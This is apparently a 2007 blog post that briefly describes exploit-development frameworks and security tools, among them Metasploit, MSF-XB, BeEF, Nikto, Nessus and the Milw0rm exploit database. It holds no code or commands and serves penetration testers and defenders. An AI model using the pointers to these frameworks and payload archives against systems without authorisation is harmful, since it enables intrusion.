Thursday, December 06, 2007

Exploit development frameworks and platforms - Metasploit, MSF-XB


The Metasploit Project is an open source computer security project aids penetration testing activities and IDS signature development and provides information on security vulnerabilities.


  • The Metasploit Framework is a development platform for creating security tools and exploits. The framework is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide. The framework is written in the Ruby programming language (rewritten from Perl) and includes components written in C and ASM. The Metasploit Framework consists of tools, libraries, modules, and user interfaces. The basic function of the framework is a module launcher, allowing the user to configure an exploit module and launch it at a target system. If the exploit succeeds, the payload is executed on the target and the user is provided with a shell to interact with the payload.
  • The Shellcode Archive contains various payloads written by the Metasploit staff. Has Windows Shellcode Development Kit.
  • The Opcode Database contains the position of certain machine language opcodes in the attacked program or included DLLs

MSF-eXploit Builder

  • MSF-eXploit Builder (MSF-XB) is free Windows GUI and Exploit Development PlatformMetasploit Framework exploit modules. It will help you to edit/modify/create/test exploit modules for the Metasploit Framework. It also contains an assortment of Fuzzers (TAOF, ProxyFuzz, FileFuzz, WinFuzz) and various other tools (Branchseeker, Faultmon, mycrc, nc, Findjmp2 and even pstools). It requires an installed Metasploit framework and a debugger (try Immunity Debugger).

SecurityForest Exploitation Framework:

  • SecurityForest's Exploitation Framework is similar in concept to Metasploit, and is written in Perl. The major difference is that it leverages the massive amount of exploits available in the ExploitTree. These exploits are publically available and do not have to be re-written to be used in the framework (no matter what language and sometimes no matter what OS). It basically acts as a Graphical User Interface to the ExploitTree which is dynamically updated at the same time as the ExploitTree.

E-mail exploitation frameworks:

  • PIRANA is an exploitation framework that tests the security of a E-mail content filter. By means of a vulnerability database, the content filter to be tested will be bombarded by various emails containing a malicious payload intended to compromise the computing platform. PIRANA's goal is to test whether or not any vulnerability exists on the content filtering platform. This tool uses the shellcode generator from the Metasploit framework!

Browser Exploitation Framework:
  • BeEF is the browser exploitation framework used to demonstrate the real-time impact of XSS browser vulnerabilities. Download here.
  • Nikto is an Open Source web server scanner which performs comprehensive tests against web servers for multiple items, including over 3500 potentially dangerous files/CGIs, versions on over 900 servers, and version specific problems on over 250 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired).

Network Vulnerability Scanners

  • Nessus is a comprehensive vulnerability scanning program. Its goal is to detect potential or confirmed weaknesses on the tested machines.
  • FwTest is a firewall testing tool.

Online vulnerability databases:
  • Secunia provides security advisories and information about patches, and provides software for vulnerability management.
  • Milw0rm is an exploit database separated by exploit type.